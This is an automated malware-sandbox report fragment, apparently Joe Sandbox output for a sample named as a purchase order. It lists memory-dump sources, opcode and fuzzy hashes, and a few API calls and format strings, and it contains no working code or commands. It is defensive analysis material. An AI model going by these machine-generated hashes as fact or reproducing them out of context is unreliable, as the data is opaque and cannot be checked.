                                                                          • Source File: 00000004.00000002.2217527999.0000000001100000.00000040.00001000.00020000.00000000.sdmp, Offset: 01100000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_4_2_1100000_New PO [FK4-7173].jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: 7fae7e227de9fda5ae611d7deaf41864431e0f7c6388c444858dc2dc183e4b8f
                                                                          • Instruction ID: 918e4c1ddec2a22cb50303c776ac374571747ddabb0a054a4dd10bf8ac143138
                                                                          • Opcode Fuzzy Hash: 7fae7e227de9fda5ae611d7deaf41864431e0f7c6388c444858dc2dc183e4b8f
                                                                          • Instruction Fuzzy Hash: F511E572A00716ABDB25EF59E980B9EFBBCFF84B50F500055DA01A7200D731AD11CB90
                                                                          Memory Dump Source
                                                                          • Source File: 00000004.00000002.2217527999.0000000001100000.00000040.00001000.00020000.00000000.sdmp, Offset: 01100000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_4_2_1100000_New PO [FK4-7173].jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: 71efea33014d70140fb21164044bd4abe60a4d4e85bf2fd321d4ad8a5de61871
                                                                          • Instruction ID: 721a4236213290b8dbdf58063565500969eed0378f75945f0f11f0ddd6c81d6a
                                                                          • Opcode Fuzzy Hash: 71efea33014d70140fb21164044bd4abe60a4d4e85bf2fd321d4ad8a5de61871
                                                                          • Instruction Fuzzy Hash: FF01D271901109EFC329DF28E408F6ABBF9EF81318F20816AE4048B261D770AD42CB90
                                                                          Memory Dump Source
                                                                          • Source File: 00000004.00000002.2217527999.0000000001100000.00000040.00001000.00020000.00000000.sdmp, Offset: 01100000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_4_2_1100000_New PO [FK4-7173].jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: 3cef38ccb94af525019048e13b43edf7cf1492b2ee9bf366ac8f969377c4ca22
                                                                          • Instruction ID: 4d3b30ce286b4a03cdd558c61be3000c95d0244e6508a64389a0a0c26f202aaa
                                                                          • Opcode Fuzzy Hash: 3cef38ccb94af525019048e13b43edf7cf1492b2ee9bf366ac8f969377c4ca22
                                                                          • Instruction Fuzzy Hash: 5511C6756166C2EBEB2E972C8544B257B94AB01B5CF1A00A0ED61C7642F328C942C251
                                                                          Memory Dump Source
                                                                          • Source File: 00000004.00000002.2217527999.0000000001100000.00000040.00001000.00020000.00000000.sdmp, Offset: 01100000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_4_2_1100000_New PO [FK4-7173].jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: 9e027ce95eb4732775abeceb8693466c215af0eeeb981fbb7873360829093128
                                                                          • Instruction ID: 0ed372d8c612a2d41679bd68cf869e4a1b7ea81e2b7ace6e344259f1f7f23e2b
                                                                          • Opcode Fuzzy Hash: 9e027ce95eb4732775abeceb8693466c215af0eeeb981fbb7873360829093128
                                                                          • Instruction Fuzzy Hash: 6101F972602905AFE72D5F58CC80FD67BA9EF80754F058024EA059B260E775DD40CBD0
                                                                          Memory Dump Source
                                                                          • Source File: 00000004.00000002.2217527999.0000000001100000.00000040.00001000.00020000.00000000.sdmp, Offset: 01100000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_4_2_1100000_New PO [FK4-7173].jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: 3c789e6569c780a36f7740ae573b44e677a8d28900b05b280d318a59104278c5
                                                                          • Instruction ID: 71be8a19088f684dca3158df5afd3600f6593957d1d4a20d02c44084c40a76b2
                                                                          • Opcode Fuzzy Hash: 3c789e6569c780a36f7740ae573b44e677a8d28900b05b280d318a59104278c5
                                                                          • Instruction Fuzzy Hash: 190149314047329BCB398F59E840A32BBF6FF56B60701892DFC958BA81D331D420CB60
                                                                          Memory Dump Source
                                                                          • Source File: 00000004.00000002.2217527999.0000000001100000.00000040.00001000.00020000.00000000.sdmp, Offset: 01100000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_4_2_1100000_New PO [FK4-7173].jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: 74b800becc606bc159b92d5b0e4bee6f7ffca6ff1bd89f0506c8425a8017136f
                                                                          • Instruction ID: a2ac3b2d32b3030b6f876c9c0d8331a043a646e7fb0866c592af4797c46939af
                                                                          • Opcode Fuzzy Hash: 74b800becc606bc159b92d5b0e4bee6f7ffca6ff1bd89f0506c8425a8017136f
                                                                          • Instruction Fuzzy Hash: C2010432561556AFC333EF1C9800E12B7A8EB81774B268325EB689B1D7D730D801CBC0
                                                                          Memory Dump Source
                                                                          • Source File: 00000004.00000002.2217527999.0000000001100000.00000040.00001000.00020000.00000000.sdmp, Offset: 01100000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_4_2_1100000_New PO [FK4-7173].jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: 821cfdb7f7777809c0eab1480a54dbea18bc7919f0de8e1871054e316746842b
                                                                          • Instruction ID: 87df5ead051e11c44ff55a9dabda6457b1ccad46ad8ff98b36d9f57b85d84d76
                                                                          • Opcode Fuzzy Hash: 821cfdb7f7777809c0eab1480a54dbea18bc7919f0de8e1871054e316746842b
                                                                          • Instruction Fuzzy Hash: AE11A136242241EFDB19EF19CD80F167BB8FF54B58F1000A5ED059B661D335ED01CA90
                                                                          Memory Dump Source
                                                                          • Source File: 00000004.00000002.2217527999.0000000001100000.00000040.00001000.00020000.00000000.sdmp, Offset: 01100000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_4_2_1100000_New PO [FK4-7173].jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: 3cc030bca722b04af536d151ef34807c74cb14d7275fa288d9a6e7b7c572d582
                                                                          • Instruction ID: d8ca5bf1a33accc01375b8e4493f20dcfd9c0766c163b011de22840833785487
                                                                          • Opcode Fuzzy Hash: 3cc030bca722b04af536d151ef34807c74cb14d7275fa288d9a6e7b7c572d582
                                                                          • Instruction Fuzzy Hash: F7115E71541229ABEB39AB64CC41FED7374FB44714F5041D4A314A61E0DB709E91CF85
                                                                          Memory Dump Source
                                                                          • Source File: 00000004.00000002.2217527999.0000000001100000.00000040.00001000.00020000.00000000.sdmp, Offset: 01100000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_4_2_1100000_New PO [FK4-7173].jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: 1b657f3cb14aa8e74b451c16f387aeaa46c8e7fa590575d87aedc84abafdcff6
                                                                          • Instruction ID: 8118c203469a48c3bacdc926394b444d2a89a780a653a29f32ce28acd216f3f9
                                                                          • Opcode Fuzzy Hash: 1b657f3cb14aa8e74b451c16f387aeaa46c8e7fa590575d87aedc84abafdcff6
                                                                          • Instruction Fuzzy Hash: 3C111772900119ABCB25DB95CC84DEFBB7CEF58258F044166E906E7211EB34AA15CBA1
                                                                          Memory Dump Source
                                                                          • Source File: 00000004.00000002.2217527999.0000000001100000.00000040.00001000.00020000.00000000.sdmp, Offset: 01100000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_4_2_1100000_New PO [FK4-7173].jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: cec1b93156338fd1fb8a58b034706470ae4e768dca4fd24834b6fe138f7a55f1
                                                                          • Instruction ID: f8129a8681817acd9ea3289079ffcac2740282288d7d7248795d4b24c372af30
                                                                          • Opcode Fuzzy Hash: cec1b93156338fd1fb8a58b034706470ae4e768dca4fd24834b6fe138f7a55f1
                                                                          • Instruction Fuzzy Hash: 180128322001118BEF1DBA1DD880F56B767BFC4700F5681A9ED158F24ADB71CC81C790
                                                                          Memory Dump Source
                                                                          • Source File: 00000004.00000002.2217527999.0000000001100000.00000040.00001000.00020000.00000000.sdmp, Offset: 01100000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_4_2_1100000_New PO [FK4-7173].jbxd
                                                                          Similarity
                                                                          • API ID: InitializeThunk
                                                                          • String ID:
                                                                          • API String ID: 2994545307-0
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_4_2_1100000_New PO [FK4-7173].jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: 304251878284b713c8060242cf3853fc41db4a66cc798d0c24d69f3ae3befdce
                                                                          • Instruction ID: bcf8d1811b137042733d4bc83786d93670e86d53a25a8b2a33c984e1a919f976
                                                                          • Opcode Fuzzy Hash: 304251878284b713c8060242cf3853fc41db4a66cc798d0c24d69f3ae3befdce
                                                                          • Instruction Fuzzy Hash: 61F024716042619BF71DA61D9D02B66329AEBD0650F35C02AEB058B2C1EBB1EC1183D5
                                                                          Memory Dump Source
                                                                          • Source File: 00000004.00000002.2217527999.0000000001100000.00000040.00001000.00020000.00000000.sdmp, Offset: 01100000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_4_2_1100000_New PO [FK4-7173].jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: 94c4a923a819c7a2392a2f4c8184d9ce29b7a1b1621a738148161288101f375a
                                                                          • Instruction ID: f63cc4e7b64edc0b958392079a08b3c83f1ab5ecb7c6fdc047189ad46e2d57fd
                                                                          • Opcode Fuzzy Hash: 94c4a923a819c7a2392a2f4c8184d9ce29b7a1b1621a738148161288101f375a
                                                                          • Instruction Fuzzy Hash: 1001AF74204A819BE33E9B2CCD49B693BA8BF40B84F894194FA018BAD6D7A9D411C211
                                                                          Memory Dump Source
                                                                          • Source File: 00000004.00000002.2217527999.0000000001100000.00000040.00001000.00020000.00000000.sdmp, Offset: 01100000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_4_2_1100000_New PO [FK4-7173].jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: abe8a162c34942eaba6aef332befd3f6f0562530e07f378f59fd36a18add1061
                                                                          • Instruction ID: ca3e3e9539e5e73006ab0efda15a2e1b46296ad3134e162d5e4f9fe072a61df9
                                                                          • Opcode Fuzzy Hash: abe8a162c34942eaba6aef332befd3f6f0562530e07f378f59fd36a18add1061
                                                                          • Instruction Fuzzy Hash: 1FF02E31749E3367E77DAA6F8410B2FB6969F90D00B05052C9651CBE80DF30DC00C784
                                                                          Memory Dump Source
                                                                          • Source File: 00000004.00000002.2217527999.0000000001100000.00000040.00001000.00020000.00000000.sdmp, Offset: 01100000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_4_2_1100000_New PO [FK4-7173].jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: 6168c74df7881035f69970a17cdbc8bbd68c52d06f01b9a11dec5043249d3eba
                                                                          • Instruction ID: 43d8af980d55c204edaed4326555fb7009f90729431410d05d8faeec3b8b3800
                                                                          • Opcode Fuzzy Hash: 6168c74df7881035f69970a17cdbc8bbd68c52d06f01b9a11dec5043249d3eba
                                                                          • Instruction Fuzzy Hash: 2FF089337529219BD7399A4DDCC0FD6B768EFD5A60F1A0065E6149B260C760EC02C7D0
                                                                          Memory Dump Source
                                                                          • Source File: 00000004.00000002.2217527999.0000000001100000.00000040.00001000.00020000.00000000.sdmp, Offset: 01100000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_4_2_1100000_New PO [FK4-7173].jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: 9dd7a7958f507f5f7cd458fcf07967301add8e265a31861808bff122348969ce
                                                                          • Instruction ID: 4389c8f059d92831b816305cd8eef0957070bca8121a691d0cb8cadae67838fc
                                                                          • Opcode Fuzzy Hash: 9dd7a7958f507f5f7cd458fcf07967301add8e265a31861808bff122348969ce
                                                                          • Instruction Fuzzy Hash: F2F0AF706153059FC318EF28C845A1EB7E4FF98714F40465AB898DB390E734EA01CB96
                                                                          Memory Dump Source
                                                                          • Source File: 00000004.00000002.2217527999.0000000001100000.00000040.00001000.00020000.00000000.sdmp, Offset: 01100000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_4_2_1100000_New PO [FK4-7173].jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: 4cdcb84ab97496671339d5fdb647af6bc44589d2c26ee95e7ea7cdc637936955
                                                                          • Instruction ID: 069867b1baab19b033e574ad56a2d3a105b1f15a30bd363ec6666690433cf801
                                                                          • Opcode Fuzzy Hash: 4cdcb84ab97496671339d5fdb647af6bc44589d2c26ee95e7ea7cdc637936955
                                                                          • Instruction Fuzzy Hash: E8F0F072A00204AFE328DB25CC00F86B7EDEF9C304F148068A944D7160EBB1DD50C754
                                                                          Memory Dump Source
                                                                          • Source File: 00000004.00000002.2217527999.0000000001100000.00000040.00001000.00020000.00000000.sdmp, Offset: 01100000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_4_2_1100000_New PO [FK4-7173].jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: 209956dd96efc003af52186b4f7897b834a9dfd9548cd3f9ef0b79c54eb27fcd
                                                                          • Instruction ID: a48bfd8bcfe54e983004d0c0f2ddca5416480c979941e25c81a928c98b93a5d1
                                                                          • Opcode Fuzzy Hash: 209956dd96efc003af52186b4f7897b834a9dfd9548cd3f9ef0b79c54eb27fcd
                                                                          • Instruction Fuzzy Hash: DCF0AF70A00209EFDB08EF69C555A9EB7B4FF18304F008056E855EB385EB34EA01CB91
                                                                          Memory Dump Source
                                                                          • Source File: 00000004.00000002.2217527999.0000000001100000.00000040.00001000.00020000.00000000.sdmp, Offset: 01100000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_4_2_1100000_New PO [FK4-7173].jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: fbbda4997b804b089b9dbbba614504bd5ecc32c792d1acb936f82dd3f4c4525c
                                                                          • Instruction ID: fa4dc2613daca498ac9210fefbc67f2404e2bed032f89b52108a0ad01811eba2
                                                                          • Opcode Fuzzy Hash: fbbda4997b804b089b9dbbba614504bd5ecc32c792d1acb936f82dd3f4c4525c
                                                                          • Instruction Fuzzy Hash: 4CF02E359122E09FE73BCBECC404B21BBC49B80B20F0989EAC58983D6AC324D880CA41
                                                                          Memory Dump Source
                                                                          • Source File: 00000004.00000002.2217527999.0000000001100000.00000040.00001000.00020000.00000000.sdmp, Offset: 01100000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_4_2_1100000_New PO [FK4-7173].jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: 165a63ce1fa66c3374b36ed215559062cb73eea86dc79ae065e51d150812d471
                                                                          • Instruction ID: 63a8c2d17c09c2df74127d4d0d4d4bbcf0cfb3e8288060eaf0df8d7e3ee3d98c
                                                                          • Opcode Fuzzy Hash: 165a63ce1fa66c3374b36ed215559062cb73eea86dc79ae065e51d150812d471
                                                                          • Instruction Fuzzy Hash: 4CF0277751EAC12ACF3A5F2C78583D92F96A75A014F19204DDEA157207CB78C483C720
                                                                          Memory Dump Source
                                                                          • Source File: 00000004.00000002.2217527999.0000000001100000.00000040.00001000.00020000.00000000.sdmp, Offset: 01100000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_4_2_1100000_New PO [FK4-7173].jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: 72ddbf1ea286955a8d6dcd47c1ffd190922c35ca6dbf742fc8b4da78947e4698
                                                                          • Instruction ID: a9c4d15503c426b3b195ce83ef033fd394b9ee82ec44d85815472d206444d4fd
                                                                          • Opcode Fuzzy Hash: 72ddbf1ea286955a8d6dcd47c1ffd190922c35ca6dbf742fc8b4da78947e4698
                                                                          • Instruction Fuzzy Hash: BEF052714116809FE32E971CC108B217BDC9B407A1F09A421C48AC3B42C365FCA0CAC9
                                                                          Memory Dump Source
                                                                          • Source File: 00000004.00000002.2217527999.0000000001100000.00000040.00001000.00020000.00000000.sdmp, Offset: 01100000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_4_2_1100000_New PO [FK4-7173].jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: 6c7572fa5744a55e43c142e8942155ae64e2404789e34097860efd8d5a2ca0e7
                                                                          • Instruction ID: 9324e425142cdfcb1fb8516925e77fd9c809d61cdb7068025f694210d900844e
                                                                          • Opcode Fuzzy Hash: 6c7572fa5744a55e43c142e8942155ae64e2404789e34097860efd8d5a2ca0e7
                                                                          • Instruction Fuzzy Hash: 76E0D8723006012BE7269E598CC0F47777EEFD2B14F04007AB9045F351CBE2DC0982A4
                                                                          Memory Dump Source
                                                                          • Source File: 00000004.00000002.2217527999.0000000001100000.00000040.00001000.00020000.00000000.sdmp, Offset: 01100000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_4_2_1100000_New PO [FK4-7173].jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: 2f21787fc4cf88bc2024fb188b518997cea13084236808dfde9be923dffdf6d3
                                                                          • Instruction ID: b28b3ae4df30ef7ea2fb6be0874f8d0ce993d3f1bc2c451dc482de7331ef7a67
                                                                          • Opcode Fuzzy Hash: 2f21787fc4cf88bc2024fb188b518997cea13084236808dfde9be923dffdf6d3
                                                                          • Instruction Fuzzy Hash: 28F0E572100204DFE3288F09D840F52B7F8EB15B64F02C029E608AB260D339EC50CBA0
                                                                          Memory Dump Source
                                                                          • Source File: 00000004.00000002.2217527999.0000000001100000.00000040.00001000.00020000.00000000.sdmp, Offset: 01100000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_4_2_1100000_New PO [FK4-7173].jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: 09d204908d37cdfbcfc5d4a721560e7c3d6986de64c378e18d154b12347e5c6c
                                                                          • Instruction ID: 7644a790b8fdf50d37e7b484593f607934d95f41e5ce8a7e5ddffa80f3e3cf96
                                                                          • Opcode Fuzzy Hash: 09d204908d37cdfbcfc5d4a721560e7c3d6986de64c378e18d154b12347e5c6c
                                                                          • Instruction Fuzzy Hash: 05F0E539204B419BDB1FDF19C040A997BE4FB85360B014094F8828B301D731E981CF91
                                                                          Memory Dump Source
                                                                          • Source File: 00000004.00000002.2217527999.0000000001100000.00000040.00001000.00020000.00000000.sdmp, Offset: 01100000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_4_2_1100000_New PO [FK4-7173].jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: f1b670d1cf9650df618e53f56da6216e466ca8c332a8d3f17e7fbf4f9511b07c
                                                                          • Instruction ID: 3ce726346e90f5698cbc2afb85cc2271e445b0aed2d22c959267016937ec407d
                                                                          • Opcode Fuzzy Hash: f1b670d1cf9650df618e53f56da6216e466ca8c332a8d3f17e7fbf4f9511b07c
                                                                          • Instruction Fuzzy Hash: 09E0D832244145BBD3395E598800F6E77AEDBD0FA4F160429E2429B950DB72DC50C7E8
                                                                          Memory Dump Source
                                                                          • Source File: 00000004.00000002.2217527999.0000000001100000.00000040.00001000.00020000.00000000.sdmp, Offset: 01100000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_4_2_1100000_New PO [FK4-7173].jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: b2b150536129fedd2406158fdbbfac0075fb0dcb7c224a15ea1459e3bb9789c7
                                                                          • Instruction ID: 8ffd3db56071ee5950256afad3200920bebe0dc2117dd97951e2eb36b50ed9d1
                                                                          • Opcode Fuzzy Hash: b2b150536129fedd2406158fdbbfac0075fb0dcb7c224a15ea1459e3bb9789c7
                                                                          • Instruction Fuzzy Hash: 23F0E531A355D24FE773E72CD640B51B7E0AF10630F0A8654D60087993C324EC80C650
                                                                          Memory Dump Source
                                                                          • Source File: 00000004.00000002.2217527999.0000000001100000.00000040.00001000.00020000.00000000.sdmp, Offset: 01100000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_4_2_1100000_New PO [FK4-7173].jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: 9c57e87189bc66aa7caf2535f5315d36853ca328742cb6eaba8c93c68780cd6a
                                                                          • Instruction ID: 009feb92ca0ae1e4346bfe7fffaa9c521e57d6052b9a4a634bf5680f4ee733a4
                                                                          • Opcode Fuzzy Hash: 9c57e87189bc66aa7caf2535f5315d36853ca328742cb6eaba8c93c68780cd6a
                                                                          • Instruction Fuzzy Hash: 9BE0DF32A00524BBDB259B998D01F9ABEACDBA0EA4F060054B600E7094E630DE00C690
                                                                          Memory Dump Source
                                                                          • Source File: 00000004.00000002.2217527999.0000000001100000.00000040.00001000.00020000.00000000.sdmp, Offset: 01100000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_4_2_1100000_New PO [FK4-7173].jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: c6a5ad91a7d0f1a4d9806dabaf8f22ecb250b1deeb68cfbfcde1a852261f70b4
                                                                          • Instruction ID: 52951a8d9866cc643dda970a9acfca5d2ece20a6d9cbc1cf80f0c16e07fa26fc
                                                                          • Opcode Fuzzy Hash: c6a5ad91a7d0f1a4d9806dabaf8f22ecb250b1deeb68cfbfcde1a852261f70b4
                                                                          • Instruction Fuzzy Hash: 5BE02B316503418BDB228A1DC140B73B7E8FF917A0F148169EE0407243D230F942C6D4
                                                                          Memory Dump Source
                                                                          • Source File: 00000004.00000002.2217527999.0000000001100000.00000040.00001000.00020000.00000000.sdmp, Offset: 01100000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_4_2_1100000_New PO [FK4-7173].jbxd
                                                                          Similarity
                                                                          • API ID: InitializeThunk
                                                                          • String ID:
                                                                          • API String ID: 2994545307-0
                                                                          • Opcode ID: 4bdb54271c1eb8770c1029578c90315ec55ba698efa63a2d4e11c0f8d1f63b82
                                                                          • Instruction ID: a304fc52c9cbdf36b8c8be430e6ebaf6fcd992e781c8c577e102bdf21b02a8df
                                                                          • Opcode Fuzzy Hash: 4bdb54271c1eb8770c1029578c90315ec55ba698efa63a2d4e11c0f8d1f63b82
                                                                          • Instruction Fuzzy Hash: 43E0D872100654ABC335FF29DD01F9B77AAEFA4768F014515F11557594CB34AC11C7C8
                                                                          Memory Dump Source
                                                                          • Source File: 00000004.00000002.2217527999.0000000001100000.00000040.00001000.00020000.00000000.sdmp, Offset: 01100000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_4_2_1100000_New PO [FK4-7173].jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: 1c3962ef014767a9d047a1ce435ecdb8fc5cd5a05dfca32f291fec24eb47eca0
                                                                          • Instruction ID: d8da4996abfccbe60c434efe2ca9991d18a433f3485ca8f565199d814e4a6e81
                                                                          • Opcode Fuzzy Hash: 1c3962ef014767a9d047a1ce435ecdb8fc5cd5a05dfca32f291fec24eb47eca0
                                                                          • Instruction Fuzzy Hash: 92E09231010A51DFE73A6F6AD80CB52BAE0FF50715F188C2DA09A024B0C77598D1CA40
                                                                          Memory Dump Source
                                                                          • Source File: 00000004.00000002.2217527999.0000000001100000.00000040.00001000.00020000.00000000.sdmp, Offset: 01100000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_4_2_1100000_New PO [FK4-7173].jbxd
                                                                          APIs
                                                                          Strings
                                                                          Similarity
                                                                          • API ID: ___swprintf_l
                                                                          • String ID: :%u.%u.%u.%u$::%hs%u.%u.%u.%u$::ffff:0:%u.%u.%u.%u$ffff:
                                                                          • API String ID: 48624451-2108815105
                                                                          • Opcode ID: 5bf77aa728d805125bf72295290a6d5d5964dd888efb08a024fe8d8f8f8e8e3a
                                                                          • Instruction ID: cc37e49180f413548ee81f9d5e13d1a5f5a4f55caecb2870c3d0f30ff956d979
                                                                          • Opcode Fuzzy Hash: 5bf77aa728d805125bf72295290a6d5d5964dd888efb08a024fe8d8f8f8e8e3a
                                                                          • Instruction Fuzzy Hash: 0651D6B5A00126AFDB19DB9C889097EFBF8BB08240B54C169F4A5D7741E374DE51CBA0
                                                                          APIs
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000004.00000002.2217527999.0000000001100000.00000040.00001000.00020000.00000000.sdmp, Offset: 01100000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_4_2_1100000_New PO [FK4-7173].jbxd
                                                                          Similarity
                                                                          • API ID: ___swprintf_l
                                                                          • String ID: :%u.%u.%u.%u$::%hs%u.%u.%u.%u$::ffff:0:%u.%u.%u.%u$ffff:
                                                                          • API String ID: 48624451-2108815105
                                                                          Memory Dump Source
                                                                          • Source File: 00000004.00000002.2217527999.0000000001100000.00000040.00001000.00020000.00000000.sdmp, Offset: 01100000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_4_2_1100000_New PO [FK4-7173].jbxd
                                                                          APIs
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000004.00000002.2217527999.0000000001100000.00000040.00001000.00020000.00000000.sdmp, Offset: 01100000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_4_2_1100000_New PO [FK4-7173].jbxd
                                                                          Similarity
                                                                          • API ID: ___swprintf_l
                                                                          • String ID: %%%u$[$]:%u
                                                                          • API String ID: 48624451-2819853543
                                                                          APIs
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000004.00000002.2217527999.0000000001100000.00000040.00001000.00020000.00000000.sdmp, Offset: 01100000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_4_2_1100000_New PO [FK4-7173].jbxd
                                                                          Similarity
                                                                          • API ID: ___swprintf_l
                                                                          • String ID: %%%u$]:%u
                                                                          • API String ID: 48624451-3050659472